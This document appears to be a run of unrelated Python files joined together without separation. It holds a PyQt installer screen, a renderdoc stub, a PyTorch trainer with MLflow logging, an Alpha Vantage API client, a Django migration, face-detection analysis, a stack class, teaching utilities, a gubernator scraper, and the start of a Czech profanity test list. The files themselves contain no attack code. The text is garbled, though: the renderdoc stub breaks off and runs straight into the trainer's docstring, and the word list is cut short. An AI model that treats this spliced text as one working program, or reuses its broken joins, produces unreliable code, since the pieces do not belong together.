self.uc_logo.setObjectName("uc_logo") self.layoutWidget = QtWidgets.QWidget(instalador_interfaz_1) self.layoutWidget.setGeometry(QtCore.QRect(190, 10, 483, 421)) self.layoutWidget.setObjectName("layoutWidget") self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.layoutWidget) self.verticalLayout_2.setContentsMargins(0, 0, 0, 0) self.verticalLayout_2.setObjectName("verticalLayout_2") self.verticalLayout = QtWidgets.QVBoxLayout() self.verticalLayout.setObjectName("verticalLayout") self.label = QtWidgets.QLabel(self.layoutWidget) self.label.setStyleSheet("font: 75 bold 22pt \"Ubuntu\";") self.label.setWordWrap(True) self.label.setObjectName("label") self.verticalLayout.addWidget(self.label) spacerItem = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding) self.verticalLayout.addItem(spacerItem) self.label_2 = QtWidgets.QLabel(self.layoutWidget) self.label_2.setStyleSheet("font: 63 14pt \"Ubuntu\";") self.label_2.setWordWrap(True) self.label_2.setObjectName("label_2") self.verticalLayout.addWidget(self.label_2) spacerItem1 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding) self.verticalLayout.addItem(spacerItem1) spacerItem2 = QtWidgets.QSpacerItem(20, 118, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding) self.verticalLayout.addItem(spacerItem2) self.verticalLayout_2.addLayout(self.verticalLayout) self.horizontalLayout = QtWidgets.QHBoxLayout() self.horizontalLayout.setObjectName("horizontalLayout") spacerItem3 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum) self.horizontalLayout.addItem(spacerItem3) spacerItem4 = QtWidgets.QSpacerItem(108, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum) self.horizontalLayout.addItem(spacerItem4) self.anterior = QtWidgets.QPushButton(self.layoutWidget) self.anterior.setEnabled(False) self.anterior.setAutoDefault(True) self.anterior.setObjectName("anterior") self.horizontalLayout.addWidget(self.anterior) self.siguiente = QtWidgets.QPushButton(self.layoutWidget) self.siguiente.setObjectName("siguiente") self.horizontalLayout.addWidget(self.siguiente) spacerItem5 = QtWidgets.QSpacerItem(28, 20, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum) self.horizontalLayout.addItem(spacerItem5) self.cancelar = QtWidgets.QPushButton(self.layoutWidget) self.cancelar.setObjectName("cancelar") self.horizontalLayout.addWidget(self.cancelar) self.verticalLayout_2.addLayout(self.horizontalLayout) self.retranslateUi(instalador_interfaz_1) QtCore.QMetaObject.connectSlotsByName(instalador_interfaz_1) def retranslateUi(self, instalador_interfaz_1): _translate = QtCore.QCoreApplication.translate instalador_interfaz_1.setWindowTitle(_translate("instalador_interfaz_1", "OJ+ Instalador")) self.label.setText(_translate("instalador_interfaz_1", "Bienvenido al instalador para el Juez En Linea OJ+")) self.label_2.setText(_translate("instalador_interfaz_1", "Este instalador lo guiará durante el proceso de instalación del Juez OJ+ en su computador.")) self.anterior.setText(_translate("instalador_interfaz_1", "Anterior")) self.siguiente.setText(_translate("instalador_interfaz_1", "Siguiente")) self.cancelar.setText(_translate("instalador_interfaz_1", "Cancelar"))# encoding: utf-8 # module renderdoc # from P:\1-Scripts\_Python\Py-Autocomplete\renderdoc.pyd # by generator 1.146 # no doc # imports import enum as __enum from .SwigPyObject import SwigPyObject class APIProperties(SwigPyObject): """ Gives some API-specific information about the capture. """ def __eq__(self, *args, **kwargs): # real signature unknown """ Return self==value. """ pass def __ge__(self, *args, **kwargs): # real signature unknown """ Return self>=value. """ pass def __gt__(self, *args, **kwargs): # real signature unknown """ Return self>value. """ pass def __hash__(self, *args, **kwargs): # real signature unknown """ Return hash(self). """ pass def __init__(self, *args, **kwargs): # real signature unknown pass def __le__(self, *args, **kwargs): # real signature unknown """ Return self<=value. """ pass def __lt__(self, *args, **kwargs): # real signature unknown """ Return self0, the train and testset will be saved in multiple .pt chunks. Specifies how many samples are stored in a chunk. If <=0, saving and loading of torch datasets will not be changed. """ def __init__( self, model_creation_function, data_source_paths: list, save_path, dataset_split_path=None, cache_path=None, batch_size: int = 1, train_print_frequency: int = 10, epochs: int = 10, dummy_epoch=True, produce_torch_datasets_only=False, num_workers: int = 10, num_validation_samples: int = 10, num_test_samples: int = 10, data_root: Path = r.data_root, data_processing_function=None, data_gather_function=None, looping_strategy=None, cache_mode=td.CachingMode.FileList, loss_criterion=MSELoss(), optimizer_function=lambda params: torch.optim.Adam(params, lr=0.0001), lr_scheduler_function=None, optimizer_path=None, classification_evaluator_function=None, checkpointing_strategy=CheckpointingStrategy.Best, run_eval_step_before_training=False, dont_care_num_samples=False, use_mixed_precision=False, sampler=None, caching_torch=True, demo_path=None, resize_label_to=(0, 0), load_test_set_in_training_mode=False, hold_samples_in_memory=True, run_name='', save_in_mlflow_directly=False, drop_last_batch=False, torch_datasets_chunk_size=0 ): # Visit the following URL to check the MLFlow dashboard. set_tracking_uri("http://swt-clustermanager.informatik.uni-augsburg.de:5000") # Setting the experiment: normally, it is the Slurm jobname, if the script is not called with slurm, # it is the name of calling script, which should help categorizing experiments as well. set_experiment(f"{Path(os.getenv('SLURM_JOB_NAME', Path(sys.argv[0]))).stem}") start_run(run_name=run_name) set_tag("User", getpass.getuser()) if save_in_mlflow_directly and get_artifact_uri() is not None: self.save_path = Path(get_artifact_uri()) else: initial_timestamp = str(datetime.now().strftime("%Y-%m-%d_%H-%M-%S")) self.save_path = save_path / initial_timestamp self.save_path.mkdir(parents=True, exist_ok=True) self.save_in_mlflow_directly = save_in_mlflow_directly self.cache_path = cache_path self.train_print_frequency = train_print_frequency self.data_source_paths = data_source_paths self.batch_size = batch_size self.load_datasets_path = dataset_split_path self.epochs = epochs self.dummy_epoch = dummy_epoch self.produce_torch_datasets_only = produce_torch_datasets_only if produce_torch_datasets_only and not dummy_epoch: raise ValueError("Can't do a cache only run without enabling dummy_epoch!") self.num_workers = num_workers self.num_validation_samples = num_validation_samples self.num_test_samples = num_test_samples self.data_processing_function = data_processing_function self.data_gather_function = data_gather_function self.looping_strategy = looping_strategy self.cache_mode = cache_mode self.data_generator = None self.test_data_generator = None self.model = None self.model_creation_function = model_creation_function self.model_name = "Model" self.logger = logging.getLogger(__name__) self.best_loss = np.finfo(float).max self.sampler = sampler self.demo_path = demo_path if demo_path is not None: caching_torch = False if caching_torch: load_and_save_path, data_loader_hash = handle_torch_caching(self.data_processing_function, self.data_source_paths, self.sampler, self.batch_size, self.num_validation_samples, self.num_test_samples) self.data_loader_hash = data_loader_hash if produce_torch_datasets_only: self.load_torch_dataset_path = None else: self.load_torch_dataset_path = load_and_save_path self.save_torch_dataset_path = load_and_save_path self.save_torch_dataset_path.mkdir(exist_ok=True, parents=True) else: self.data_loader_hash = "NOT_CACHING" self.load_torch_dataset_path = None self.save_torch_dataset_path = None if self.demo_path is not None: self.data_loader_hash = "DEMO_MODE" self.load_torch_dataset_path = Path(self.demo_path) self.save_torch_dataset_path = Path(self.demo_path) self.optimizer_function = optimizer_function self.lr_scheduler_function = lr_scheduler_function self.lr_scheduler = None self.optimizer_path = optimizer_path self.optimizer = None self.device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu") self.loss_criterion = loss_criterion self.checkpointing = checkpointing_strategy self.classification_evaluator_function = classification_evaluator_function self.classification_evaluator = None self.run_eval_step_before_training = run_eval_step_before_training self.dont_care_num_samples = dont_care_num_samples self.drop_last_batch = drop_last_batch self.use_mixed_precision = use_mixed_precision self.resize_label = resize_label_to self.load_test_set_in_training_mode = load_test_set_in_training_mode self.hold_samples_in_memory = hold_samples_in_memory self.torch_datasets_chunk_size = torch_datasets_chunk_size self.data_root = data_root def __create_datagenerator(self, test_mode=False): try: generator = td.LoopingDataGenerator( self.data_source_paths, self.data_gather_function, self.data_processing_function, batch_size=self.batch_size, num_validation_samples=self.num_validation_samples, num_test_samples=self.num_test_samples, split_load_path=self.load_datasets_path, split_save_path=self.save_path, split_data_root=self.data_root, num_workers=self.num_workers, cache_path=self.cache_path, cache_mode=self.cache_mode, looping_strategy=self.looping_strategy, save_torch_dataset_path=self.save_torch_dataset_path, load_torch_dataset_path=self.load_torch_dataset_path, dont_care_num_samples=self.dont_care_num_samples, test_mode=test_mode, sampler=self.sampler, load_test_set_in_training_mode=self.load_test_set_in_training_mode, drop_last_batch=self.drop_last_batch, hold_samples_in_memory=self.hold_samples_in_memory, torch_datasets_chunk_size=self.torch_datasets_chunk_size ) except Exception: logger = logging.getLogger(__name__) logger.exception("Fatal Error:") exit() return generator def __get_model_def(self): model_as_str = self.model_name + ": \n" if self.model.__class__.__name__ == "DataParallel": m = list(self.model.children())[0] else: m = self.model for c in m.named_children(): if len(list(c[1].parameters())) == 0: model_as_str += str(c) model_as_str += " \n" continue else: # If first parameter of layer is frozen, so is the rest of the layer -> parameters()[0] model_as_str += "~~ " if not list(c[1].parameters())[0].requires_grad else "" model_as_str += str(c) model_as_str += " ~~ \n" if not list(c[1].parameters())[0].requires_grad else " \n" return model_as_str def __print_info(self): param_count = count_parameters(self.model) sched_str = self.lr_scheduler.__class__.__name__ + f" \n{self.lr_scheduler.state_dict()}" \ if self.lr_scheduler is not None else "None" # Log file self.logger.info("###########################################") self.logger.info(">>> Model Trainer INFO <<<") self.logger.info(f"Loss criterion: {self.loss_criterion}") self.logger.info(f"Optimizer: {self.optimizer}") self.logger.info(f"LR scheduler: {sched_str}") self.logger.info(f"Batch size: {self.batch_size}") self.logger.info(f"Model: {self.model}") self.logger.info(f"Parameter count: {param_count}") self.logger.info("###########################################") # ML Flow log_param("General/LossCriterion", f"{self.loss_criterion}") log_param("General/BatchSize", f"{self.batch_size}") log_param("General/Epochs", f"{self.epochs}") log_param("General/MixedPrecision", f"{self.use_mixed_precision}") optim_str = str(self.optimizer).replace("\n", " \n") log_param("Optimizer/Optimizer", f"{optim_str}") log_param("Optimizer/LRScheduler", f"{sched_str}") log_param("Model/Structure", f"{self.__get_model_def()}") log_param("Model/ParamCount", f"{param_count}") if hasattr(self.model, "round_at") and self.model.round_at is not None: log_param("Model/Threshold", f"{self.model.round_at}") log_param("Data/SourcePaths", f"{[str(p) for p in self.data_source_paths]}") log_param("Data/CheckpointSourcePath", f"{self.load_datasets_path}") dl_info = self.data_processing_function.__self__.__dict__ dl_info["data_processing_function"] = self.data_processing_function.__name__ dl_str = ' \n'.join([f"{k}: {dl_info[k]}" for k in dl_info if dl_info[k] is not None]) log_param("Data/DataLoader", f"{dl_str}") def __create_model_and_optimizer(self): logger = logging.getLogger(__name__) logger.info("Generating Model") if not self.use_mixed_precision: if self.model is None: self.model = self.model_creation_function() self.model_name = self.model.__class__.__name__ if "swt-dgx" in socket.gethostname(): logger.info("Invoking data parallel model.") self.model = nn.DataParallel(self.model).to("cuda:0") else: self.model = self.model.to("cuda:0" if torch.cuda.is_available() else "cpu") self.create_optimizer_and_lr_scheduler() else: if self.model is None: self.model = self.model_creation_function() self.model_name = self.model.__class__.__name__ self.create_optimizer_and_lr_scheduler() self.model = self.model.cuda() self.model, self.optimizer = amp.initialize(self.model, self.optimizer, opt_level="O1") if "swt-dgx" in socket.gethostname(): logger.info("Invoking data parallel model.") self.model = nn.DataParallel(self.model).to("cuda:0") def create_optimizer_and_lr_scheduler(self): if self.optimizer is None: if self.optimizer_path is None: self.optimizer = self.optimizer_function(self.model.parameters()) else: self.logger.info(f'Loading optimizer state from {self.optimizer_path}') self.optimizer = self.optimizer_function(self.model.parameters()) checkpoint = torch.load(self.optimizer_path) self.optimizer.load_state_dict(checkpoint['optimizer_state_dict']) if self.lr_scheduler_function is not None: self.lr_scheduler = self.lr_scheduler_function(self.optimizer) def start_training(self,): """ Sets up training and logging and starts train loop """ # self.save_path.mkdir(parents=True, exist_ok=True) if self.demo_path is not None: print(f"Running in demo mode. Please refer to {self.save_path} for logs et al.") logging_cfg.apply_logging_config(self.save_path) self.classification_evaluator = self.classification_evaluator_function() logger = logging.getLogger(__name__) logger.info("Generating Generator") self.data_generator = self.__create_datagenerator() if self.data_generator.loaded_train_set: self.dummy_epoch = False logger.info("Saving code and generating SLURM script for later evaluation") eval_preparation(self.save_path) self.__create_model_and_optimizer() self.__print_info() if self.dummy_epoch: logger.info("Prefetching a dummy epoch to get proper shuffling on the first training epoch") start_time = time.time() for i, _ in enumerate(self.data_generator): ctime = time.time() if ctime - start_time > 60: start_time = ctime logger.info(f"Fetched {i} batches.") logger.info(f"Total number of samples: {len(self.data_generator)}") if self.run_eval_step_before_training: logger.info("Running eval before training to see, if any training happens") validation_loss = self.__eval(self.data_generator.get_validation_samples(), 0, 0) log_metric("Validation/Loss", validation_loss, 0) if self.produce_torch_datasets_only: logger.info(f"Triggering caching, saving all datasets to {self.save_torch_dataset_path}") logger.info("Training dataset ...") iter(self.data_generator) logger.info("Validation dataset ...") _ = self.data_generator.get_validation_samples() logger.info("Test dataset ...") _ = self.data_generator.get_test_samples() else: logger.info("The Training Will Start Shortly") self.__train_loop() if not self.save_in_mlflow_directly: log_artifacts(self.save_path) logging.shutdown() end_run() def __train_loop(self): start_time = time.time() eval_step = 0 step_count = 0 for epoch in range(self.epochs): i = 0 self.logger.info(f"Starting epoch {epoch}") epoch_start = time.time() for inputs, label, aux in self.data_generator: inputs = inputs.to(self.device, non_blocking=True) label = label.to(self.device, non_blocking=True) self.optimizer.zero_grad() outputs = self.model(inputs) label = self.resize_label_if_necessary(label) loss = self.loss_criterion(outputs, label) log_metric("Training/Loss", loss.item(), step_count) if not self.use_mixed_precision: loss.backward() else: with amp.scale_loss(loss, self.optimizer) as scaled_loss: scaled_loss.backward() self.optimizer.step() if i % self.train_print_frequency == 0 and i != 0: time_delta = time.time() - start_time if len(self.data_generator) == 0: progress = 0 else: progress = i / (len(self.data_generator) / self.batch_size) eta = (len(self.data_generator) / self.batch_size - i) * ((time.time() - epoch_start) / i) hours = f"{eta // 3600}h " if eta // 3600 > 0 else "" self.logger.info( f"Loss: {loss.item():12.4f} || Duration of step {step_count:6}: {time_delta:10.2f} s; " f"{progress * 100:.2f}% of epoch done; ETA {hours}{(eta % 3600) // 60:.0f}min {eta % 60:.0f}s" ) start_time = time.time() i += 1 step_count += 1 validation_loss = self.__eval(self.data_generator.get_validation_samples(), eval_step, step_count) log_metric("Validation/Loss", validation_loss, step_count) if self.lr_scheduler is not None: old_lr = [pg['lr'] for pg in self.optimizer.state_dict()['param_groups']] self.lr_scheduler.step() self.logger.info(f"LR scheduler step; LR: {old_lr} -> " f"{[pg['lr'] for pg in self.optimizer.state_dict()['param_groups']]}") eval_step += 1 def __eval(self, data_set, eval_step=0, step_count=0, test_mode=False): """Evaluators must have a commit, print and reset function. commit updates the evaluator with the current step, print can show all relevant stats and reset resets the internal structure if needed." """ with torch.no_grad(): self.model.eval() loss = 0 count = 0 for i, (data, label, aux) in enumerate( self.__batched(data_set, self.batch_size) ): auxs = list(td.split_aux_dicts(aux)) data = data.to(self.device, non_blocking=True) label = label.to(self.device, non_blocking=True) # data = torch.unsqueeze(data, 0) # label = torch.unsqueeze(label, 0) output = self.model(data) label = self.resize_label_if_necessary(label) current_loss = self.loss_criterion(output, label).item() loss = loss + current_loss count += 1 output = output.cpu() label = label.cpu() data = data.cpu() if self.classification_evaluator is not None: self.classification_evaluator.commit(output, label, data, auxs) loss = loss / count self.logger.info(f"{eval_step} Mean Loss on Eval: {loss:8.8f}") if self.classification_evaluator is not None: self.classification_evaluator.print_metrics(step_count) self.classification_evaluator.reset() self.model.train() if not test_mode: if self.checkpointing == CheckpointingStrategy.Best and loss < self.best_loss: self.__save_checkpoint(eval_step, loss) self.best_loss = loss elif self.checkpointing == CheckpointingStrategy.All: self.__save_checkpoint(eval_step, loss, fn=f"checkpoint_{eval_step}.pth") return loss def resize_label_if_necessary(self, label): """ Resize the label: saves online storage by making it possible to use the bigger image labels of 1140 sensors also for 80 and 20 sensors :param label: :return: """ if self.resize_label != (0, 0): label = torch.nn.functional.interpolate(label.reshape(-1, 1, label.shape[1], label.shape[2]), self.resize_label) label = label.squeeze() return label def __save_checkpoint(self, eval_step, loss, fn=r.chkp): torch.save( { "epoch": eval_step, "model_state_dict": self.model.state_dict(), "optimizer_state_dict": self.optimizer.state_dict(), "loss": loss, }, self.save_path / Path(fn), ) def __load_checkpoint(self, path): """Loads the parameters of a previously saved model and optimizer, loss and epoch. See the official PyTorch docs for more details: https://pytorch.org/tutorials/beginner/saving_loading_models.html Args: path (Path): Path to the stored checkpoint. """ if torch.cuda.is_available(): checkpoint = torch.load(path) else: checkpoint = torch.load(path, map_location="cpu") new_model_state_dict = OrderedDict() model_state_dict = checkpoint["model_state_dict"] if "swt-dgx" not in socket.gethostname(): for k, v in model_state_dict.items(): if k.startswith("module"): k = k[7:] # remove `module.` new_model_state_dict[k] = v self.model.load_state_dict(new_model_state_dict) else: self.model.load_state_dict(model_state_dict) self.optimizer.load_state_dict(checkpoint["optimizer_state_dict"]) epoch = checkpoint["epoch"] loss = checkpoint["loss"] return epoch, loss def __batched(self, data_l: list, batch_size: int): return DataLoader(data_l, batch_size=batch_size, shuffle=False, drop_last=self.drop_last_batch) def inference_on_test_set(self, output_path: Path = None, checkpoint_path: Path = None, classification_evaluator_function=None): """Start evaluation on a dedicated test set. Args: output_path: Directory for test outputs. checkpoint_path : ... classification_evaluator_function: lambda with Evaluator object that should be used for the test run. """ if output_path is not None: save_path = output_path / "eval_on_test_set" save_path.mkdir(parents=True, exist_ok=True) else: save_path = self.save_path if self.demo_path is not None: print(f"Eval - running in demo mode. Please refer to {save_path.absolute()} for log / results.") logging_cfg.apply_logging_config(save_path, eval=True) logger = logging.getLogger(__name__) self.__create_model_and_optimizer() logger.info("Generating Test Generator") data_generator = self.__create_datagenerator(test_mode=True) logger.info("Loading Checkpoint") if checkpoint_path is not None: logger.info(f"Loading Checkpoint: {checkpoint_path}") self.__load_checkpoint(checkpoint_path) else: logger.info(f"Loading Checkpoint: {self.save_path / r.chkp}") self.__load_checkpoint(self.save_path / r.chkp) data_list = data_generator.get_test_samples() if classification_evaluator_function is not None: self.classification_evaluator = classification_evaluator_function() logger.info("Starting inference") self.__eval(data_list, test_mode=True) logger.info("Inference completed.") logging.shutdown() import requests from os import listdir from os.path import isfile, join import glob import json class AlphaVantageController(object): def __init__(self, key): self.key = key self.endpointfactory = AlphaVantageEndpointFactory(key) def makeTimeSeriesRequest(self,function,symbol,interval,outputsize): factory = self.endpointfactory options = {"symbol":symbol,"interval":interval,"outputsize":outputsize} endpoint = factory.makeEndpoint(function,options) response = requests.get(endpoint) data = json.loads(response.text) return data def makeApiRequest(self,function,options): factory = self.endpointfactory endpoint = factory.makeEndpoint(function,options) response = requests.get(endpoint) data = json.loads(response.text) return data def makeCryptoRequest(self,symbol,fiat): None def readSymbolsFromFile(self,filename,clean_method = lambda x : x, column = 0, separator = ",", startline = 0): if(filename == None or filename == ""): raise ValueError("Filename must not be empty") with open(filename) as f: content = f.readlines() symbols = [] for i in range(startline, len (content)): line = content[i] symbol = line.split(separator)[column] cleaned_symbol = clean_method(symbol) symbols.append(cleaned_symbol) return symbols def readSymbolsFromMultipleFiles(self,filenames,clean_method = lambda x : x,column = 0,separator = ",",startline = 0): if(filenames == None or len(filenames) == 0): raise ValueError("Filenames cant be None or empty") all_symbols = [] for filename in filenames: symbols = self.readSymbolsFromFile(filename,clean_method,column,separator,startline) all_symbols.extend(symbols) return all_symbols class AlphaVantageEndpointFactory(object): base_url = "https://www.alphavantage.co/query?" intervals = ["1min","5min","15min","30min","60min"] outputsizes = ["compact","full"] outputsize_default = "compact" requirements_file = "alpha_vantage_api_requirements.txt" def __init__(self,apikey): self.apikey = apikey self.requirements = self.readRequirements() def makeEndpoint(self,function,options): options["apikey"] = self.apikey keys = options.keys() reqs = self.requirements #Checks if the function is valid and supported if(function == "" or function == None or function not in reqs.keys()): raise ValueError("Not a valid function") #Find the fields required for the spesific function function_requirements = reqs[function] required_options = [k for k,v in function_requirements.iteritems() if v == "required"] #Check if some of required option are not present for option in required_options: if(option not in keys): raise ValueError("Not all required fields are present. Missing " + option) url = self.base_url #Check if the options provided are supported for key in keys: if(function_requirements[key] == "none"): raise ValueError("This option " + key + " is not supported by function " + function) #Build the url url += "function=" + function for option,param in options.iteritems(): url += "&" url += option + "=" + param return url def readRequirements(self): requirements = {} with open(self.requirements_file) as f: content = f.readlines() params = content[0].split(";") for i in range(1, len(content)): line = content[i] options = line.split(";") function_name = options[0] options_dict = {} for j in range(1,len(options)): param = params[j] option = options[j] options_dict[param] = option requirements[function_name] = options_dict return requirements def readSettings(self): settings = {} with open("alpha_vantage_setting.txt") as f: content = f.readlines() for line in content: setting = line.split("=") variable = setting[0] value = setting[1] settings[variable] = value return settings def parseSettings(self): None 0 # Generated by Django 3.0.4 on 2020-05-21 16:50 from django.db import migrations, models class Migration(migrations.Migration): initial = True dependencies = [ ] operations = [ migrations.CreateModel( name='Variable', fields=[ ('name', models.CharField(max_length=100, primary_key=True, serialize=False, verbose_name='Name')), ('value', models.CharField(max_length=100, verbose_name='Wert')), ], ), ] # -*-coding=utf-8-*- import matplotlib.font_manager a = sorted([f.name for f in matplotlib.font_manager.fontManager.ttflist]) for i in a: print(i) playground/face_detection_playground.py import pandas as pd import numpy as np import matplotlib.pyplot as plt from experiment_handler.label_data_reader import read_experiment_phases, read_location_labels, read_activity_labels_from_eyetracker_labelling from experiment_handler.face_det_reader import get_face_detection_data from feature_calculations.colocation.common import get_colocation_labels, get_location_of_persons_at_samples def face_detection_vs_location(exp_root): phases = read_experiment_phases(experiment) start = phases['assembly'][0] end = phases['disassembly'][1] face_detections = get_face_detection_data(exp_root, start, end, "video") loc_labels = read_location_labels(exp_root) infos = [] for p in loc_labels.keys(): detections_for_person = face_detections.loc[face_detections["person_id"] == p] for label in loc_labels[p]: during_label = detections_for_person.loc[ detections_for_person["timestamp"].between(label["start"], label["end"])] current = { "person_id": p, "location": label["location"], "duration": label["end"] - label["start"], "face_count": during_label["timestamp"].size, } infos.append(current) infos = pd.DataFrame(infos) locations = infos["location"].unique() for loc in locations: at_location = infos.loc[infos["location"] == loc] print(loc, at_location["face_count"].sum()/at_location["duration"].sum(), at_location["duration"].sum()) def face_detection_vs_activity(experiment, replacements, remove_labels): phases = read_experiment_phases(experiment) start = phases['assembly'][0] end = phases['disassembly'][1] activity_labels = read_activity_labels_from_eyetracker_labelling(experiment, "video", replacements, remove_labels) activity_labels.drop_duplicates(inplace=True) face_detections = get_face_detection_data(experiment, start, end, "video") activity_labels["duration"] = activity_labels["end"] - activity_labels["start"] activities = activity_labels["label"].unique() persons = activity_labels["subject"].unique() infos = [] for p in persons: detections_for_person = face_detections.loc[face_detections["person_id"] == p] for index, label in activity_labels.loc[activity_labels["subject"] == p].iterrows(): during_label = detections_for_person.loc[detections_for_person["timestamp"].between(label["start"], label["end"])] current = { "person_id": p, "activity": label["label"], "duration": label["end"] - label["start"], "face_count": during_label["timestamp"].size, } infos.append(current) infos = pd.DataFrame(infos) #print(infos) for act in activities: at_location = infos.loc[infos["activity"] == act] print(act, at_location["face_count"].sum()/at_location["duration"].sum(), at_location["duration"].sum()) f, axarr = plt.subplots(4, sharex=True, figsize=(16, 10)) for idx, test_for in enumerate(["P1", "P2", "P3", "P4"]): person_dets = face_detections.loc[face_detections["person_id"] == test_for] face_det_times = person_dets["timestamp"].as_matrix() face_det_y = np.ones(len(face_det_times))*6.4 axarr[idx].plot(face_det_times, face_det_y, '|', ms=10, color="red", label="face detections") height = 0.05 for index, label in activity_labels.loc[activity_labels["subject"] == test_for].iterrows(): y_pos = (list(activities).index(label["label"])) / (len(activities)) + 0.08 axarr[idx].axvspan(label["start"], label["end"], y_pos - height / 2, y_pos + height / 2, color="#1f77b4") axarr[idx].grid() axarr[idx].legend() axarr[idx].set_title(test_for) axarr[idx].set_ylabel("Activity") axarr[idx].set_yticks(range(1, len(activities) + 1)) axarr[idx].set_ylim([0.5, 6.5]) axarr[idx].set_yticklabels(activities) plt.xlabel("Time [s]") plt.show() def face_detection_vs_colocation(exp_root): step = 5 window_length = 15 # seconds phases = read_experiment_phases(experiment) start = phases['assembly'][0] end = phases['disassembly'][1] sample_times = np.arange(start, end, step) location_labels = read_location_labels(exp_root) locations = get_location_of_persons_at_samples(location_labels, sample_times, exp_root) colocation_labels = get_colocation_labels(locations) face_detections = get_face_detection_data(experiment, start, end, "video") persons = ["P1", "P2", "P3", "P4"] results = [] for p in persons: persons_face_detections = face_detections.loc[face_detections["person_id"] == p] for t in sample_times: faces_in_window = persons_face_detections.loc[ persons_face_detections["timestamp"].between(t - window_length, t)] colocated = 0 colocated_max = window_length / step + 1 # check in windows (number of person colocated with) for pp in persons: if p == pp: continue p_vs_pp_col = colocation_labels[p][pp] tmp = p_vs_pp_col[p_vs_pp_col[:, 0] >= t - window_length, :] tmp = tmp[tmp[:, 0] <= t, :] colocated += (np.sum(tmp, axis=0)[1] * 100 / colocated_max) facecount = faces_in_window["timestamp"].size current_result = { "person_id": p, "colocated": colocated, "face_count": facecount, "timestamp": t } results.append(current_result) results = pd.DataFrame(results) x_values = results["colocated"].unique() print(x_values) x_values = [100, 200, 300] titles = ["Co-located with one participant", "Co-located with two participants", "Co-located with three participants"] y_values = [] for x in x_values: x_range = 10 tmp = results.loc[results["colocated"].between(x - x_range, x + x_range), "face_count"].as_matrix() y_values.append(tmp[tmp < 1000]) print(x_values) f, axarr = plt.subplots(1, 3, sharey=True, figsize=(16, 5)) n_bin = 30 for i in range(0, 3): axarr[i].hist(y_values[i], bins=n_bin) axarr[i].set_title(titles[i]) axarr[i].grid() axarr[i].set_ylabel("Count") axarr[1].set_xlabel("Number of faces detected in a window of " + str(window_length) + " seconds") plt.show() # Create overall plot for p in persons: plt.figure() plt.plot(results.loc[results["person_id"] == p]["colocated"], results.loc[results["person_id"] == p]["face_count"], 'x') plt.title(p) plt.draw() plt.figure(figsize=(8, 3)) plt.plot(results["colocated"], results["face_count"], 'x') plt.ylabel("Number of detected faces") plt.xlabel("Person co-located with other participant in window [%]") plt.tight_layout() plt.show() if __name__ == '__main__': experiment = "/Volumes/DataDrive/igroups_recordings/igroups_experiment_8" activity_label_replacements = [ ("walking on the floor", "Walk"), ("carry tv spacer", "Walk"), ("carry tools", "Walk"), ("TV lifting: taking out of the box", "Screen placement"), ("TV lifting: putting on the wall", "Screen placement"), ("TV lifting: taking off the wall", "Screen placement"), ("TV lifting: putting in the box", "Screen placement"), ("carry screen", "Carry"), ("screw: by screw driver", "Screwdriver"), ("screw: by electric drill", "Drill"), ("screw: by hand", "Adjust"), ("placing items", "Adjust"), ("unpack tools", "Adjust"), ] activity_labels_to_remove = [ "synchronisation", ] face_detection_vs_colocation(experiment) exit() face_detection_vs_location(experiment) face_detection_vs_activity(experiment, activity_label_replacements, activity_labels_to_remove)Data-Structures/graph/graph/stack.py from graph.node import Node class Stack: def __init__(self): ''' create a constructor ''' self.top = None def push(self, value): ''' push method to add element to stack ''' node = Node(value) node.next = self.top self.top = node def pop(self): ''' pop method to return and delete first element in stack ''' if(self.top is None): raise Exception('You cant pop from empty stack') temp=self.top.value self.top=self.top.next return temp def peek(self): ''' peek method to return and do not delete first element in stack ''' if(self.top is None): raise Exception('You cant peek from empty stack') return self.top.value def is_empty(self): ''' is_empty method to check if stack empty or not ''' return self.top == Nonedemos/assignment_10/8am/mytools.py #!/usr/bin/env python3 """ Simple utility library to demonstrate importing and using functions from a module. """ from random import choice, randint, randrange def create_random_tuple(): """ Return a tuple with length between 10 and 20 (inclusive), populated with random integers between 1 and 100 (inclusive). """ return tuple([randint(1, 100) for _ in range(randrange(10, 21))]) def choose_random(values): """ Return a random value from the tuple passed as an argument. """ return choice(values) def has_common_element(a, b): """ Return True if iterables a and b have at least one element in common. """ return not len(set(a) & set(b)) == 0 def filter_even(l): """ Return a new list consisting of the members of l that are odd. """ return [num for num in l if num % 2 != 0] if __name__ == "__main__": print("Exercising create_random_tuple()") t = create_random_tuple() print(f"{type(t)} {t}") print() print("Exercising choose_random()") print(choose_random(t)) print() print("Imagine has_common_element() and filter_even() being exercised here...") print() ii-ci/apisnoop #!/usr/bin/env python import yaml try: from urllib.request import urlopen, urlretrieve except Exception as e: from urllib import urlopen, urlretrieve import re from bs4 import BeautifulSoup import click gubernator = "https://gubernator.k8s.io/builds/kubernetes-jenkins/logs/" def get_html(url): html = urlopen(url).read() soup = BeautifulSoup(html, 'html.parser') return soup @click.command() @click.argument('sources') def main(sources): # https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation syaml = yaml.load(open(sources).read(),Loader=yaml.FullLoader) for top, level in syaml.items(): for sublevel, entry in level.items(): for bucket, jobs in entry.items(): testgrid_history = get_html(gubernator + bucket) latest_success= int( testgrid_history.find( title=re.compile("SUCCESS") ).parent.text.split( '\n' )[0].encode ( 'ascii','ignore' ) ) syaml[top][sublevel][bucket]=[latest_success] with open(sources, "w") as f: yaml_content = yaml.dump(syaml, indent=4, default_flow_style=False) f.write(yaml_content) print(yaml_content) if __name__ == "__main__": main() import pickle from nose.tools import eq_ from .. import czech from ...datasources import revision_oriented from ...dependencies import solve from .util import compare_extraction BAD = [ "arnulfo", "blb", "blbá", "blbec", "blbej", "blbost", "blbosti", "buzerant", "buzeranti", "buzik", "buzna", "buzny", "curaci", "curak", "čumíš", "čuráci", "čůráci", "čurak", "čurák", "čůrák", "čuráka", "ddd", "dddd", "ddddd", "debil", "debile", "debilní", "debilové", "debilů", "dementi", "děvka", "ekrimi", "eskader", "exkrementu", "fekaliemi", "fekalni", "freeforfun", "fuck", "fuj", "gay", 